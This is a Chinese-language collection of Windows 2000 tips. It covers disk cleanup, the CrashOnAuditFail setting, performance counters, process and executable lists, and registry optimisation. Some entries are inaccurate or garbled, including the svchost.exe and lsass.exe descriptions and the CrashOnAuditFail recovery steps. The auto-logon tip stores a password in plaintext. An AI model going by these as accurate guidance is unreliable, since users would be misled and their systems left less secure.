    A: >del x\:hiberfil.sys （释放Windows2000休眠功能占用的磁盘空间）；
    A: >del x\:pagefile.sys （释放Win2000虚拟内存占用的磁盘空间）。
    注:我们这里以Win2000安装在x盘为例，将Win2000和Win98安装在一个硬盘上的朋友在进行操作之前一定要考虑好你删除的是不是Win98要使用的文件。另外我们这里假定你的Win2000是安装在FAT或者FAT32分区，如果是安装在Win98不能识别的NTFS分区，你可能需要特殊的分区软件来进行这些操作，比如Partition Magic（你可以到http://www.powerquest.com/去下载一个Demo版本）。将NTFS分区格式转化为FAT或者FAT32再进行上述操作。
    相信大家在看了这篇稿子之后，关于Win2000的一般问题都可以解决了吧！希望大家都用得高兴!


Win2000故障解决一览

《一键清理系统垃圾》

Win2000故障解决一览

Win2000的推出标志着操作系统达到了一个新的阶段，但是由于的实在是太多了（听说有6万多条，可怕？），在使用的过程中各种的问题接踵而来，下面将我在实际中碰到的问题列出，希望对大家有点帮助。

1、当安全日志装满时，暂停计算机，采取下面的步骤：
（1）打开事件查看器。
（2）在控制台树中，右键单击“安全日志”，然后单击“属性”。
（3）在“常规”选项卡上，单击“改写久于 n 天的事件”或“不改写事件（手动清除日志）”。
（4）单击“开始”，单击“运行”，键入 regedit，进入“HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Control\Lsa”，右键点击“CrashOnAuditFail”，创建“REG_DWORD” 类型，值为“1”。
（5）重新启动计算机。
警告:
（1）:错误地编辑注册表可能会严重损坏系统。更改注册表之前，至少应该备份计算机上任何有用的数据。
（2）:结束此过程之后，当安全日志装满时，Windows 2000 将停止响应并显示"审核失败"的消息。当 Windows 2000 停止时，若要进行恢复，必须清除安全日志。
注意:
（1）：必须作为管理员或管理组成员登录才能完成该过程。
（2）：要打开事件查看器，请单击“开始”，指向“设置”，然后单击“控制面板”。双击“管理工具”，然后双击“事件查看器”。
（3）如果 Windows 2000 由于安全日志已满而暂停，则必须重新启动系统，如果将来需要用装满的日志停机，则必须重复该过程。

2、Windows 2000 停止时恢复
（1）重新启动计算机并用系统管理员组中的帐户登录。
（2）打开“事件查看器”，存档目前记录的安全事件（如果需要），然后从安全日志中清除全部事件。
（3）打开注册表编辑器并找到以下注册表项：“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa”
右键点击“Lsa”，从弹出的菜单中创建“EG_DWORD”型 取值为 “1”，删除并替换 CrashOnAuditFail 值。退出注册表编辑器并重新启动计算机。
注意：
(1)如果以前曾用 CrashOnAuditFail = 1 配置注册表，并且安全日志已满，Windows 2000 将停止响应并显示“审核失败”的消息。如果发生这种情况，请使用上面的步骤。
(2)要启动“注册表编辑器”，请单击“开始”，单击“运行”，键入 regedit，然后单击“确定”。
(3)要在备份过程中捕获注册表变化，确保运行备份程序时在备份集中包含系统状态数据。

3、查找内存瓶颈
在性能工具中使用下列计数器标识出现瓶颈的内存资源：
（1）System\ Processor Queue Length
（2）Memory\ Pages/sec

4、查找磁盘瓶颈
    在性能工具中使用下列计数器标识出现瓶颈的磁盘资源：
（1）PhysicalDisk\ % Disk Time 和 % Idle Time
（2）PhysicalDisk\ Disk Reads/sec 和 Disk Writes/sec
（3）PhysicalDisk\ Avg.Disk Queue Length
（4）LogicalDisk\ % Free Space
    还要监视内存计数器，以确定是否有过多的内存分页使磁盘使用紧张。
    注意：与物理磁盘计数器的数据不同，逻辑磁盘计数器的数据默认情况下不是由操作系统搜集。要获得逻辑驱动器或存储卷的性能计数器数据，必须在命令提示符下键入diskperf -yv。这会导致用于搜集磁盘性能数据的磁盘性能统计驱动程序报告逻辑驱动器和存储卷的数据。默认情况下，操作系统使用diskperf -yd 命令包含物理驱动器数据。有关使用 diskperf命令的详细信息，请在命令提示符下键入 diskperf -?。

5、查找处理器瓶颈
    在性能工具中使用下列计数器标识出现瓶颈的处理器资源：
（1）Processor\ Interrupts/sec
（2）Processor\ % Processor Time
（3）Process(process)\ % Processor Time
（4）System\ Processor Queue Length

6、找网络瓶颈
在性能工具中使用下列计数器标识出现瓶颈的网络资源：
（1）Network Interface\ Bytes Total/sec、Bytes Sent/sec 和 Bytes Received/sec
（2）Protocol_layer_object\ Segments Received/sec、Segments Sent/sec、Frames Sent/sec 和 Frames Received/sec 对于 NWLink 性能对象，与帧有关的计数器只报告零。对这些对象使用基于数据报的计数器。
（3）Server\ Bytes Total/sec、Bytes Received/sec 和 Bytes Sent/sec
（4）Network Segment\ % Network Utilization

返回


Win2000记事本的新功能

《一键清理系统垃圾》

Win2000记事本的新功能

1、“编辑”菜单增加“替换”和“转到”功能，可以进行文本查找替换，“转到”可以快速转到文件第某行，编辑功能增强了。

    2、增加ctrl+s快捷“保存”文件；ctrl+o快捷“打开”文件；ctrl+f快捷查找；ctrl+h快捷替换；ctrl+a全部选定；ctrl+g快捷转到等快捷键，功能使用更方便。

    3、支持保存文件的编码格式设定，包括：ANSI、Unicode、Unicode big endian、UTF_8等四种编码格式。

    （注：Unicode是所有全球重要脚本的超集。它包含商业和计算机通用的字符集。在将文档保存为Unicode格式时，可以使用Unicode控制字符对诸如阿拉伯和希伯来语言的文本流和方向起帮助作用。在Windows 2000中，有些字体无法显示所有Unicode字符。如果在文本文件中看到某些字符丢失，可以将字体更改为包含字符的文件。一般来讲，Microsoft Sans Serif对于Unicode字符是一种好的选择。

    在big-endian处理器（如Macintosh）上创建的Unicode文档中词的字节（存储单位），其排列顺序与在Intel处理器上创建的文档中词的字节排列顺序相反。最主要的字节位于最低的地址上，并且词较大的一端首先存储。要使这些类型的计算机上的用户可以访问您的文档，请用big-endian Unicode格式保存“记事本”文件。

    UTF代表“通用字符集转换格式”。UTF-8是8位形式的Unicode。如果使用的是旧的、支持在单独字节中仅8位有效数据的传输媒体，则请将文档按UTF-8保存。）

    4、支持大文本文件的读取，现在你打开几个M的文件也没问题了，不会再提示你“文件太大，记事本文法打开。要用写字板读取文件吗？”的提示了。

返回


Win2000进程

《一键清理系统垃圾》

Win2000进程

Windows 2000/XP 的任务管理器是一个非常有用的工具，它能提供我们很多信息，比如现在系统中运行的程序（进程），但是面对那些文件可执行文件名我 们可能有点茫然，不知道它们是做什么的，会不会有可疑进程（病毒，木马等）。本文的目的就是提供一些常用的Windows 2000 中的进程名，并简单说明它们的用处。

在Windows 2000 中,系统包含以下缺省进程：
Csrss.exe
Explorer.exe
Internat.exe
Lsass.exe
Mstask.exe
Smss.exe
Spoolsv.exe
Svchost.exe
Services.exe
System
System Idle Process
Taskmgr.exe
Winlogon.exe
Winmgmt.exe

下面列出更多的进程和它们的简要说明

进程名描述

smss.exeSessionManager
csrss.exe 子系统服务器进程
winlogon.exe管理用户登录
services.exe包含很多系统服务
lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。
svchost.exe Windows 2000/XP 的文件保护系统
SPOOLSV.EXE 将文件加载到内存中以便迟后打印。)
explorer.exe资源管理器
internat.exe托盘区的拼音图标)
mstask.exe允许程序在指定时间运行。
regsvc.exe允许远程注册表操作。(系统服务)->remoteregister
winmgmt.exe 提供系统管理信息(系统服务)。
inetinfo.exemsftpsvc,w3svc,iisadmn
tlntsvr.exe tlnrsvr
tftpd.exe 实现 TFTP Internet 标准。该标准不要求用户名和密码。
termsrv.exe termservice
dns.exe 应答对域名系统(DNS)名称的查询和更新请求。
tcpsvcs.exe 提供在 PXE 可远程启动客户计算机上远程安装 Windows 2000 Professional 的能力。
ismserv.exe 允许在 Windows Advanced Server 站点间发送和接收消息。
ups.exe 管理连接到计算机的不间断电源(UPS)。
wins.exe为注册和解析 NetBIOS 型名称的 TCP/IP 客户提供 NetBIOS 名称服务。
llssrv.exe证书记录服务
ntfrs.exe 在多个服务器间维护文件目录内容的文件同步。
RsSub.exe 控制用来远程储存数据的媒体。
locator.exe 管理 RPC 名称服务数据库。
lserver.exe 注册客户端许可证。
dfssvc.exe管理分布于局域网或广域网的逻辑卷。
clipsrv.exe 支持“剪贴簿查看器”，以便可以从远程剪贴簿查阅剪贴页面。
msdtc.exe 并列事务，是分布于两个以上的数据库，消息队列，文件系统或其它事务保护护资源管理器。
faxsvc.exe帮助您发送和接收传真。
cisvc.exe 索引服务
dmadmin.exe 磁盘管理请求的系统管理服务。
mnmsrvc.exe 允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。
netdde.exe提供动态数据交换 (DDE) 的网络传输和安全特性。
smlogsvc.exe配置性能日志和警报。
rsvp.exe为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功功能。
RsEng.exe 协调用来储存不常用数据的服务和管理工具。
RsFsa.exe 管理远程储存的文件的操作。
grovel.exe扫描零备份存储(SIS)卷上的重复文件，并且将重复文件指向一个数据存储点，以节省磁盘空间（只对 NTFS 文件系统有用）。
SCardSvr.ex 对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。
snmp.exe包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。
snmptrap.exe接收由本地或远程 SNMP 代理程序产生的陷阱（trap）消息，然后将消息传递到运行在这台计算机上 SNMP 管理程序。
UtilMan.exe 从一个窗口中启动和配置辅助工具。
msiexec.exe依据 .MSI 文件中包含的命令来安装、修复以及删除软件。

总结： 发现可疑进程的秘诀就是要多看任务管理器中的进程列表，看多了以后，一眼就可以发现可可疑进程，就象找一群熟悉人中的陌生人一样。


Win2000命令全集

《一键清理系统垃圾》

Win2000命令全集

accwiz.exe > Accessibility Wizard for walking you through setting up your machine for your mobility needs. 辅助工具向导
acsetups.exe > ACS setup DCOM server executable

actmovie.exe > Direct Show setup tool 直接显示安装工具

append.exe > Allows programs to open data in specified directories as if they were in the current directory. 允许程序打开制定目录中的数据

arp.exe > NETWORK Display and modify IP - Hardware addresses 显示和更改计算机的IP与硬件物理地址的对应列表

at.exe > AT is a scheduling utility also included with UNIX 计划运行任务

atmadm.exe > Displays statistics for ATM call manager. ATM调用管理器统计

attrib.exe > Display and modify attributes for files and folders 显示和更改文件和文件夹属性

autochk.exe > Used to check and repair Windows File Systems 检测修复文件系统

autoconv.exe > Automates the file system conversion during reboots 在启动过程中自动转化系统

autofmt.exe > Automates the file format process during reboots 在启动过程中格式化进程

autolfn.exe > Used for formatting long file names 使用长文件名格式

bootok.exe > Boot acceptance application for registry

bootvrfy.exe > Bootvrfy.exe, a program included in Windows 2000 that notifies the system that startup was successful. Bootvrfy.exe

can be run on a local or remote computer. 通报启动成功

cacls.exe > Displays or modifies access control lists (ACLs) of
files. 显示和编辑ACL

calc.exe > Windows Calculators 计算器

cdplayer.exe > Windows CD Player CD播放器

change.exe > Change { User | Port | Logon } 与终端服务器相关的查询

charmap.exe > Character Map 字符映射表

chglogon.exe > Same as using "Change Logon" 启动或停用会话记录

chgport.exe > Same as using "Change Port" 改变端口（终端服务）

chgusr.exe > Same as using "Change User" 改变用户（终端服务）

chkdsk.exe > Check the hard disk for errors similar to Scandisk 3
Stages must specify a Drive Letter 磁盘检测程序

chkntfs.exe > Same as using chkdsk but for NTFS NTFS磁盘检测程序

cidaemon.exe > Component of Ci Filer Service 组成Ci文档服务

cipher.exe > Displays or alters the encryption of directories
[files] on NTFS partitions. 在NTFS上显示或改变加密的文件或目录

cisvc.exe > Content Index -- It’s the content indexing service for
I 索引内容

ckcnv.exe > Cookie Convertor 变换Cookie

cleanmgr.exe > Disk Cleanup, popular with Windows 98 磁盘清理

cliconfg.exe > SQL Server Client Network Utility SQL客户网络工具

clipbrd.exe > Clipboard viewer for Local will allow you to connect
to other clipboards 剪贴簿查看器

clipsrv.exe > Start the clipboard Server 运行Clipboard服务

clspack.exe > CLSPACK used to create a file listing of system
packages 建立系统文件列表清单

cluster.exe > Display a cluster in a domain 显示域的集群

_cmd_.exe > Famous command prompt 没什么好说的！

cmdl32.exe > Connection Manager Auto-Download 自动下载连接管理

cmmgr32.exe > Connection Manager 连接管理器

cmmon32.exe > Connection Manager Monitor 连接管理器监视

cmstp.exe > Connection Manager Profile Manager 连接管理器配置文件安装
程序

comclust.exe > about cluster server 集群

comp.exe > ComClust Add, Remove, or Join a cluster. 比较两个文件和文
件集的内容＊

compact.exe > Displays or alters the compression of files on NTFS
partitions. 显示或改变NTFS分区上文件的压缩状态

conime.exe > Console IME IME控制台

control.exe > Starts the control panel 控制面板

convert.exe > Convert File System to NTFS 转换文件系统到NTFS

convlog.exe > Converts MS IIS log files 转换IIS日志文件格式到NCSA格
式

cprofile.exe > Copy profiles 转换显示模式

cscript.exe > MS Windows Scripts Host Version 5.1 较本宿主版本

csrss.exe > Client Server Runtime Process 客户服务器Runtime进程

csvde.exe > Comma Separated Variable Import/Export Utility 日至格式转换程序

dbgtrace.exe > 和Terminal Server相关

dcomcnfg.exe > Display the current DCOM configuration. DCOM配置属性

dcphelp.exe > ?

dcpromo.exe > Promote a domain controller to ADSI AD安装向导

ddeshare.exe > Display DDE shares on local or remote computer DDE共享

ddmprxy.exe >

debug.exe > Runs Debug, a program testing and editing tool. 就是DEBUG啦！

dfrgfat.exe > Defrag FAT file system FAT分区磁盘碎片整理程序

dfrgntfs.exe > Defrag NTFS file system NTFS分区磁盘碎片整理程序

dfs_cmd_.exe > configures a Dfs tree 配置一个DFS树

dfsinit.exe > Distributed File System Initialization 分布式文件系统初始化

dfssvc.exe > Distributed File System Server 分布式文件系统服务器

diantz.exe > MS Cabinet Maker 制作CAB文件

diskperf.exe > Starts physical Disk Performance counters 磁盘性能计数器

dllhost.exe > dllhost is used on all versions of Windows 2000.
dllhost is the hedost process for all COM+ applications. 所有COM+应用软件的主进程

dllhst3g.exe >

dmadmin.exe > Disk Manager Service 磁盘管理服务

dmremote.exe > Part of disk management 磁盘管理服务的一部分

dns.exe > DNS Applications DNS

doskey.exe > recalls Windows command lines and creates macros 命令行
创建宏

dosx.exe > DOS Extender DOS扩展

dplaysvr.exe > Direct Play Helper 直接运行帮助

drwatson.exe > Dr Watson for 2000 Fault Detector 华生医生错误检测

drwtsn32.exe > Dr Watson for 2000 viewer and configuration manager
华生医生显示和配置管理

dtcsetup.exe > Installs MDTC

dvdplay.exe > Windows 2000 DVD player DVD播放

dxdiag.exe > Direct-X Diagnostics Direct-X诊断工具

edlin.exe > line-oriented text editor. 命令行的文本编辑器（历史悠久啊！）
edlin.exe > line-oriented text editor. 命令行的文本编辑器（历史悠久啊！）

esentutl.exe > MS Database Utility MS数据库工具

eudcedit.exe > Private character editor Ture Type造字程序

eventvwr.exe > Windows 2000 Event Viewer 事件查看器

evnt_cmd_.exe > Event to trap translator; Configuration tool

evntwin.exe > Event to trap translator setup

exe2bin.exe > Converts EXE to binary format 转换EXE文件到二进制

expand.exe > Expand Files that have been compressed 解压缩

extrac32.exe > CAB File extraction utility 解CAB工具

fastopen.exe > Fastopen tracks the location of files on a hard disk and stores the information in memory for fast access. 快速访问在内存中的硬盘文件

faxcover.exe > Fax Cover page editor 传真封面编辑

faxqueue.exe > Display Fax Queue 显示传真队列

faxsend.exe > Fax Wizard for sending faxes 发送传真向导

faxsvc.exe > Starts fax server 启动传真服务

fc.exe > Compares two files or sets of files and their differences
比较两个文件的不同

find.exe > Searches for a text string in file or files 查找文件中的文本行

findstr.exe > Searches for strings in files 查找文件中的行

finger.exe > Fingers a user and displays statistics on that user
Finger一个用户并显示出统计结果

fixmapi.exe > Fix mapi files 修复MAPI文件

flattemp.exe > Enable or disable temporally directories 允许或者禁用临时文件目录

fontview.exe > Display fonts in a font file 显示字体文件中的字体

forcedos.exe > Forces a file to start in dos mode. 强制文件在DOS模式下运行

freecell.exe > Popular Windows Game 空当接龙

ftp.exe > File Transfer Protocol used to transfer files over a
network connection 就是FTP了

gdi.exe > Graphic Device Interface 图形界面驱动

grovel.exe >

grpconv.exe > Program Manager Group Convertor 转换程序管理员组

help.exe > displays help for Windows 2000 commands 显示帮助

hostname.exe > Display hostname for machine. 显示机器的Hostname

ie4uinit.exe > IE5 User Install tool IE5用户安装工具

ieshwiz.exe > Customize folder wizard 自定义文件夹向导

iexpress.exe > Create and setup packages for install 穿件安装包

iisreset.exe > Restart IIS Admin Service 重启IIS服务

internat.exe > Keyboard Language Indicator Applet 键盘语言指示器

ipconfig.exe > Windows 2000 IP configuration. 察看IP配置

ipsecmon.exe > IP Security Monitor IP安全监视器

ipxroute.exe > IPX Routing and Source Routing Control Program IPX路由和源路由控制程序

irftp.exe > Setup FTP for wireless communication 无线连接

ismserv.exe > Intersite messaging Service 安装或者删除Service Control Manager中的服务

jdbgmgr.exe > Microsoft debugger for java 4 Java4的调试器

jetconv.exe > Convert a Jet Engine Database 转换Jet Engine数据库

jetpack.exe > Compact Jet Database. 压缩Jet数据库

jview.exe > Command-line loader for Java Java的命令行装载者

krnl386.exe > Core Component for Windows 2000 2000的核心组件

label.exe > Change label for drives 改变驱动器的卷标

lcwiz.exe > License Compliance Wizard for local or remote systems.
许可证符合向导

ldifde.exe > LDIF cmd line manager LDIF目录交换命令行管理

licmgr.exe > Terminal Server License Manager 终端服务许可协议管理

lights.exe > display connection status lights 显示连接状况

llsmgr.exe > Windows 2000 License Manager 2000许可协议管理

llssrv.exe > Start the license Server 启动许可协议服务器

lnkstub.exe >

locator.exe > RPC Locator 远程定位

lodctr.exe > Load perfmon counters 调用性能计数

logoff.exe > Log current user off. 注销用户

lpq.exe > Displays status of a remote LPD queue 显示远端的LPD打印队列的状态，显示被送到基于Unix的服务器的打印任务

lpr.exe > Send a print job to a network printer. 重定向打印任务到网络中的打印机。通常用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务器。

lsass.exe > LSA Executable and Server DLL 运行LSA和Server的DLL

lserver.exe > Specifies the new DNS domain for the default server 指定默认Server新的DNS域

macfile.exe > Used for managing MACFILES 管理MACFILES

magnify.exe > Used to magnify the current screen 放大镜

makecab.exe > MS Cabinet Maker 制作CAB文件

mdm.exe > Machine Debug Manager 机器调试管理

mem.exe > Display current Memory stats 显示内存状态

migpwd.exe > Migrate passwords. 迁移密码

mmc.exe > Microsoft Management Console 控制台

mnmsrvc.exe > Netmeeting Remote Desktop Sharing NetMeeting远程桌面共享

mobsync.exe > Manage Synchronization. 同步目录管理器


Win2000设置技巧

《一键清理系统垃圾》

Win2000设置技巧

许多设置涉及到注册表，请小心操作，注意备份！

    对象为Windows 2000 Professional。

    内存性能优化：

    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Memory Management 中设置 ClearPageFileAtShutdown=1。

    若内存≥128M，进行如下优化：

    DisablePagingExecutive键值设为1：系统正运行的文件被强制保留在内存中而非移入虚拟内存。

    LargeSystemCache键值设为1：Windows 2000使用系统缓存（同Windows 9x中Vcache），使磁盘输入/输出性能有巨大提高。

    系统性能优化：

    1. CPU二级缓存

    L2：CPU二级缓存，是CPU的一个组成部分。然而，Windows2000不对二级缓存作出检测 ，需手动设定。

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\MemoryManagement\SecondLevelDataCache，值（以KB为单位）调整为所用CPU的二级缓存实际大小。

    注：可选用十六进制或十进制，填入大小值应该选十进制。

    2. 修改磁盘缓存

    Windows2000默认的I/O页面文件比较保守。对于不同的内存，采用不同的磁盘缓存是较好的做法。

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\IoPageLockLimit中，根据内存修改其十六进制值：

    64M→1000；

    128M→4000；

    256M→10000；

    512M或更大→40000。

    3. IRQ中断请求

    计算机的每一个主要部件都设IRQ中断号。通过修改每个IRQ请求的优先次序实现优化。这里的优化对象是系统/CMOS实时钟，通过主板来提升性能。

    1）确定需要获得更高的性能的组件。

    2）找到组件正在使用的IRQ中断号。系统属性→硬件→设备管理器→右击待查组件→属性→资源，可以看到设备正在使用的IRQ中断号。记录中断号。

    3）HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\PriorityControl中新建DWORD双字节值IRQ#Priority（#是具体中断号），值设为1。

    4）重新启动。

    建议优化系统CMOS实时钟（IRQ8），改善整块主板的性能。如要撤消优化设置，只要删除设置的注册表键值。

    4. 不加载DLL文件

    浏览器在使用之后往往会有部分DLL文件在内存中驻留一段时间，部分内存会被无用的DLL文件占用。

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer新建字符值：AlwaysUnloadDLL，值设为1。

    如要去除这项优化，将该键值设为0（或删除键值）。

    注意：该项优化在Windows重新启动后生效。

    5. 删除多余的DLL文件

    Windows2000的System和System32目录下有大量dll文件被系统或应用软件共享。经常安装卸载软件会增加dll垃圾文件，占用硬盘空间，降低系统运行速度。

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SharedDLLs中，存放有关软件共享的dll路径信息，每个dll文件的项值表明它已被几个应用软件共享。如果该项值为0，则说明不被任何软件共享，可以删除，然后再删除对应的dll文件。

    6. 精简注册表（慎用！）

    精简注册表的方法是重建注册表：

    1）Windows2000下用Regedit导出整个注册表（注意：要确保导出全部注册表而非一个分支），将其存为c:\x.reg。

    2）用DOS 7.0重新启动，载入磁盘高速缓存程序Smartdrv.exe以加快处理速度。

    3）运行DOS版的REGEDIT：C:\Windows\regedit/c x.reg（参数/C表示从后面指定文件中重新生成整个注册表），重建的注册表文件比减小25-30%左右，达到精简目的。

    7. 等待时间优化

    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control中：

    WaitToKillServiceTimeout设为：1000或更小。

    HKEY_CURRENT_USER\Control Panel\Desktop和HKEY_USERS\Control Panel\Desktop中：

    （1）WaitToKillAppTimeout改为1000，即关闭程序时仅等待1秒；

    （2）HungAppTimeout值改为：200，表示程序出错时等待0.5秒；

    3）AutoEndTasks值改为1，表示自动关闭停止相应的程序。

    8. 快速定位鼠标

    Windows 2000允许用户对鼠标的采样速率进行设定，使鼠标能更精确地移动和定位。

    鼠标的采样速率设置为100Hz，输入缓冲区长度设置为300Hz。如果在设置后系统变得不稳定，改变采样速率，设置成80Hz或以下即可。

    9. 快速显示菜单

    Windows 2000的默认菜单显示是“淡入淡出”的效果，这种效果下，修改菜单的显示速度并不明显。

    将“动画显示菜单和工具提示”效果”改为“滚动效果”。

    HKEY_CURRENT_USER\ControlPanel\Desktop中MenuShowDelay项，这一项的取值范围是0～100000（单位为毫秒），将默认的值改为0或者是400。

    10. 删除多余的键盘布局、输入法和区域设置

    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts中，对应“控制面板”中的“键盘布局/输入法”，可直接删除未用语言的键盘布局和未用的输入法子项；

    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale中，是“区域设置”，保留值不为空的项值，其它的全部删除。

    11. 删除系统不用的字体和HELP文档（慎用！）

    把\WINNT\Fonts整个目录打包压缩成一个文件保存。删除所有不用的字体，只保留Arial、Marlett、Micosoft Scans Serif Regular 、MingLiU & PmingLiU、Modern、MS Outlook、MS Serif 8,10,12、Script、SimSun & NsimSun、Tahoma、Times New Roman、宋体、仿宋、楷体、黑体几个字体。需要其它字体时解压对应的字体到Fonts目录中。

    12. 在“运行”中添加“在单独的内存空间中运行”的选项

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer中，新建DWORD型MemCheckBoxInRunDlg，值设为1。

    注：默认情况下，所有16位程序都在单一共享的 VDM （虚拟DOS机器）进程中作为线程运行。这种情况下，这些程序共享分配给 VDM 进程的内存空间，因此不能同时运行。所作设置就是允许用户在专用的(不是共享的)VDM进程中运行16位程序。复选框只在用户在输入16位程序时才被启用。

    启动优化：

    1.取消系统检测串口

    打开 Boot.ini 文件，如下修改：

    [operating systems]

    multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows 2000 Professional" /fastdetect/NoSerialMice

    启动时不检测行串口，缩短启动时间。

    2. 快速启动

    multi(0)disk(0)rdisk(0)partition(2)\WINNT="Microsoft Windows 2000 Professional" /fastdetect

    改为：multi(0)disk(0)rdisk(0)partition(2)\WINNT="Microsoft Windows 2000 Professional" /nodetect

    HKey_Local_Machine\System\ControlSet001\Control中，SystemStartOptions键值改为nodetect

    3.关闭无用服务

    运行→Services.msc→Windows2000服务的详细列表。

    Windows 2000服务设置

    4. 加快启动和减少故障恢复时间

    减少Windows2000系统启动时显示操作系统列表的时间。如果不是网络系统管理员，可以去掉“将事件写入系统日志”和“发出管理警报”两个选项，并将“写入调试信息”设置为“无”。

    5. 删掉不需要的组件

    （1）去除文件夹选项的文件隐藏、只读等属性；

    （2）\WINNT\inf文件夹，用记事本打开sysoc.ini文件，替换“,hide”为空，保存退出。控制面板→添加/删除程序→添加/删除Windows组件，根据需要修改。

    6. 屏蔽CD自动播放

    启动时，打开CD自动播放功能会延缓启动速度。运行→gpedit.msc→管理模板，设置是否自动播放CD。

    7. 快速登录计算机系统

    系统属性→网络ID→网络标识→根据“网络标识向导”操作。

    设置时注意：选择“本机用于家庭，不是商业网络的一部分”，以及“Windows始终假设下列用户已登录到本机上”。

    HKEY_LOCAL_MACHINE\Software\Microsoft\WinNT\CurrentVersion\Winlogon中，

    （1）AutoAdminLogon值改为“1”

    （2）DefaultDomainName值改为所要登录的域名或本机计算机名

    （3）DefaultUserName值改为自动登录的用户名

    （4）DefaultPassword值改为密码。（注意：这几个都是字符串值。）

    如果想临时取消自动登录或者需要以其他用户名登录，在启动时按住Shift键。

    8. 加快Explorer启动速度

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Explorer\RemoteComputer\NameSpace中：

    删除{D6277990-4C6A-11CF-8D87-00AA0060F5BF} (计划任务)

    9. Windows 2000启动盘制作：

    （1）Windows 2000 启动盘：d:\bootdisk\makeboot a:

    （2）Windows 2000 引导盘：ntldr，ntdlect.com，boot.ini，IO.sys

    （3）Windows 2000 紧急修复磁盘（ERD）：ntbackup.exe


Win2000优化完全版

《一键清理系统垃圾》

Win2000优化完全版

    Win2000中文正式版，相信各位早就将她领进家了吧！笔者从Win2000（以下简称Win2K）Beta专业版到正式专业版一直都在跟踪使用她，个人感觉稳定性比起WinNT有过之而无不及，这正是笔者从Win9X全面转向Win2K的主要原因，现在终于可以摆脱Win9x那令人厌恶的蓝色怪脸（蓝屏）了。不仅如此，Win2K作为网络时代的操作系统，对于上网族而言性能比起Win9X更是没得说！不要认为Win2K是专为企业用户准备的，它同样适用于您的爱机，当然您的爱机起码得有64M以上的内存和一颗跳动300MHz以上的“心”。在这篇文章里我不仅要告诉您如何全面优化Win2K，更要让您明白为什么要这样做。

一、控制面板设置篇

“控制面板”一直都是Windows操作系统设置和调整的中枢，在Win2K中“控制面板”进一步得到了发扬光大，很多原来在Win9X中需要通过修改注册有才能达到的效果，现在可以直接在“控制面板”中进行。既然要优化Win2K的性能，那么我们理所当然要先对“控制面板”下刀。刀磨好了吗？Follow me！动手吧！

1．Internet属性

不要将Internet临时文件（脱机浏览文件）放在与操作系统相同的分区中，因为脱机的网页文件具有数量多、文件小、随机性强的特点，它会使您的磁盘系统在短期内产生大量的碎片从而影响Win2K文件系统性能。Win2K是一个多用户操作系统，因此其默认脱机文件存放的路径是与Win9X不相同的，它存放在与Win2K相同磁盘根目录下的Documents and SettingsAdministrator（这是系统管理员目录，如果您是以其他身份登录系统的话，该文件夹名就是您登录时的用户名）Local SettingsTemporary Internet Files。要改变脱机文件的存放路径，请先点击“Internet”→“常规”选项页下的“Internet临时文件”设置按钮，在弹出的“设置”对话框中点“移动文件夹（M）…”按钮进行更改。

2．鼠标属性

在“鼠标”→“指针”中取消“启用指针阴影”特性。虽然指针阴影美化了鼠标指针，但这是以消耗系统资源为代价的。

3．添加／删除程序

在“添加／删除Windows组件”中看起来似乎什么都删除不了，其实这只不过是老比先生做的小手脚罢了。现在让我们来解决它：用“记事本”打开winntinfsysoc.inf文件，用“编辑”菜单的“替换”命令，在“查找内容”中填入“,hide”，按“全部替换”后存盘。再回到“添加／删除Windows组件”中看看。怎么样，还满意吧！虽然可定制删除／安装的名堂还不是很多，但终究可以删除掉一些不喜欢的东东了。

4．网络和拨号连接

您上网了吗？（怎么听起来像广告语！）在这里通过您的调教，您的猫将会更乐意听候您的差遣。首先打开您建立的Internet拨号连接属性，它应该包含“常规”、“选项”、“安全措施”、“网络”四个页面，具体设置如下：

A、“选项”页：取消“拨号连接”中的“提示名称、密码和证书等”。它不会影响到您拨号上网时的密码验证。

B、“网络”页：按“设置”按钮，进入“PPP设置”，它包括三个设置项：1．“启用LCP扩展”——LCP扩展即链接控制协议扩展。LCP的作用是创建和配置PPP帧，由它定义的PPP标准帧格式可确保所有远程访问软件能够通讯和识别来自遵守PPP标准的所有远程访问软件传输的数据包。它是连接到远程PPP（点对点协议）服务器的重要组成部分，对维护和协调网络数据包传输的正确性起重要作用。如果选中了该项设置使得Internet连接出现问题，则可能是远程服务器不支持LCP扩展，此时您应禁用该设置。2．“启用软件压缩”——在Win2K中额外提供了一种软件方式的数据压缩方法，以获得更高的网络数据吞吐量。您的猫本身就提供了硬件压缩，根据猫的不同，调制解调器会尽力压缩所有数据，而不管数据是否已压缩过（如jpg图像、zip文档），这样做实际上降低了传输已压缩数据的效率。“启用软件压缩”则不会存在这种问题，它会直接将已压缩过的数据传输出去。另外“启用软件压缩”的一个重要因素是计算机能提供比MODEM更多的大模式缓冲区，因此软件压缩能获得比硬件压缩更高的数据传输效率。我的建议是：如果您的MODEM说明书指明支持V.42bis协议的话，您可以不启用软件压缩。如果您经常上传很多压缩的数据，那么不妨启用它吧！在实际使用中，您可以将两种压缩方式分别试试，看哪种方式更适合您。请注意：不要同时应用这两种压缩方法，因为已通过软件压缩的数据不可能在硬件下得到更大的压缩率，调制解调器所使用的压缩算法反过来可能增加数据的大小，它只会给您的系统带来不必要的负担，而不是更优化的效率。（关闭MODEM硬件压缩的方法：进入“电话和调制解调器”→“调制解调器